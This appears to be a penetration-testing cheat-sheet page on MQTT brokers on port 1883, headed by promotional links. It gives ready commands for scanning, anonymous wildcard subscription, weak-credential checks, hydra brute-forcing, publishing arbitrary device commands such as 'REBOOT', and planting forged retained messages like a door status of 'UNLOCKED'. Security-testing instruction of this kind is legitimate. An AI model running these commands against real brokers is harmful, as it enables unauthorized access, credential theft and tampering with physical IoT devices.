# MQTT (Message Queuing Telemetry Transport) - Port 1883

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is **Mosquitto**. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.

Key characteristics:

* Default port: TCP 1883 (unencrypted), 8883 (TLS)
* Stateless pub/sub model
* Authentication optional
* Wildcard topics and retained messages

***

### Discovering MQTT Services via Network Scanning

#### Nmap Detection of MQTT Brokers

Scan for MQTT using service and version detection:

```bash
nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>
```

Useful Nmap NSE scripts:

* `mqtt-subscribe.nse` — connects and subscribes to common topics
* `mqtt-connect.nse` — attempts anonymous authentication

#### Manual Enumeration with Netcat or Telnet

```bash
telnet <target-ip> 1883
```

A successful TCP connection shows that the port is open; an acknowledgment from the broker (a CONNACK in reply to a CONNECT packet) confirms its presence.

***

### Assessing Authentication and Authorization Mechanisms

Many MQTT brokers allow **anonymous access** by default. Check this using `mosquitto_sub`:

```bash
mosquitto_sub -h <target-ip> -t '#' -v
```

If the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.

Check whether a weak credential pair is accepted:

```bash
mosquitto_sub -h <target-ip> -t '#' -v -u test -P test
```

***

### Exploiting Publish and Subscribe for Information Disclosure

#### Read All Topics with Wildcards

```bash
mosquitto_sub -h <target-ip> -t '#' -v
```

This reveals:

* Sensor values
* Credentials sent by devices
* Internal control commands
* Presence of retained messages

#### Publishing Arbitrary Payloads

```bash
mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'
```

This could trigger real-world actions on connected devices if a device is subscribed to the topic.

***

### Brute Forcing MQTT Credentials

Use `hydra` for credential brute-force:

```bash
hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -V
```

***

### Persistent Attacks with Retained Messages

Retained messages persist even after the publisher disconnects, making them ideal for:

* Persistence payloads
* Credential harvesting
* Fake sensor data injection

Set a retained payload:

```bash
mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -r
```

When a new subscriber connects, it immediately receives the forged message.
